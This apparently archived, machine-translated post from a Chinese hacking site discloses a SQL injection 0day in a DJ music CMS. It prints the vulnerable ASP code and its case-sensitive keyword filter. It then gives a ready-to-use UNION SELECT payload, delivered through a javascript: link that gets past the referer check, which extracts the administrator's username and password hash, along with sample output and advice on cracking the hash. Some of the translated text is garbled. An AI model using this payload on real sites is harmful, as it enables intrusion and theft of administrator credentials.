Seven jubilee dance music management system v3. 0 0day analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62200925779
Type myhack58
Reporter 佚名
Modified 2009-12-31T00:00:00


<!--# Include File="CmsDj. Conn. asp" - > <!--# Include File="CmsDj. Function. asp" - > <% From_url = Cstr(Request. ServerVariables("HTTP_REFERER")) Serv_url = Cstr(Request. ServerVariables("SERVER_NAME")) If mid(From_url,8,len(Serv_url)) <> Serv_url Then //determine the REFERER Response. Write "does not support external links too!" Response. End End If id=SafeRequest("id","get") //get parameter id ac=SafeRequest("ac","get") //get ac Set CmsDjMusic = New CmsDj_Com_Dj Set CmsDjServer = New CmsDj_Com_Server Set Rs = CmsDjMusic. GetRs("CD_ID,CD_Url,CD_Server,CD_Singer,CD_Name,CD_ClassID",0,"CD_ID="&ID) //id into the SQL If rs. EOF And rs. BOF Then Response. write "" Response. End

Else If Rs("CD_Server")<>0 Then Set RsServer = CmsDjServer. GetRs("CD_Url",0,"CD_ID="&Rs("CD_Server")) PlayUrl = RsServer("CD_Url")&Rs("CD_Url") Set RsServer = Nothing Else PlayUrl = Rs("CD_Url") End If End If CD_Url=LCase(Rs("CD_Url")) If left(CD_Url,1 8)="http://www.rayfile" Then HttpUrl=CD_Url CmsDj_Com_RayFileA = GetHttpPage(HttpUrl,"utf-8") CmsDj_Com_RayFileB=PureMVC(CmsDj_Com_RayFileA,"<div class=""btn_indown_zh-cn""><a href=""","""></a></div><div id=""divsavetomyfile""",False,False) CmsDj_Com_RayFileC = GetHttpPage(CmsDj_Com_RayFileB,"utf-8") PlayUrl=PureMVC(CmsDj_Com_RayFileC,"var downloads_url= ['","'];",False,False) End If If ac="lplay" Then Response. Write "var i"&rs("CD_ID")&"="""&rs("CD_ID")&""";var s"&rs("CD_ID")&"="""&rs("CD_Singer")&""";var n"&rs("CD_ID")&"="""&rs("CD_Name")&""";var u"& rs("CD_ID")&"="""&amp; PlayUrl&""";var t"&rs("CD_ID")&"="""&rs("CD_ClassID")&""";" //print content Else Response. write PlayUrl End If Set Rs = Nothing %>

SafeRequest function code:

Function SafeRequest(Key,Modes) Dim ParaValue,strFilter,FilterArr,i Select Case Lcase(Modes) Case "get" ParaValue=Trim(Request. QueryString(Key)) Case "post" ParaValue=Trim(Request. Form(Key)) Case "auto" ParaValue=Trim(Request(Key)) End Select IF IsNum(ParaValue) Then SafeRequest=ParaValue Exit Function Else //if the Get parameter value is not numeric, which checks if it contains the following keywords strFilter="'|and|(|)|exec|insert|select|delete|update|*|chr|mid|master|truncate|declare" FilterArr=Split(strFilter,"|") For i=0 To Ubound(FilterArr) IF Instr(ParaValue,FilterArr(i))>0 Then ParaValue=ReplaceStr(ParaValue,FilterArr(i),DBC2SBC(FilterArr(i),0)) End IF Next SafeRequest=ParaValue End IF SafeRequest = FilterScript(SafeRequest) End Function

But without regard to case, while analyzing the REFERER, just bring the REFERER at the same time case the following sql statement on the line exp:

javascript:document. write("<a href='/include/GetUrl. asp? ac=lplay&id=-1 Union Select CD_AdminUserName,CD_AdminPassWord,null,4,5,6 From CmsDj_Admin'>Click me</a>");void(0);


> > var iadmin="admin";var received="4";var nadmin="5";var uadmin="1bfb4b8ad622424eb8302ae5d622424eb8302ae5";var tadmin="6"; > >

Wherein iadmin=is behind the account, uadmin="the rear is md5, the note that the md5 only take the first 1 6 bits to crack on the line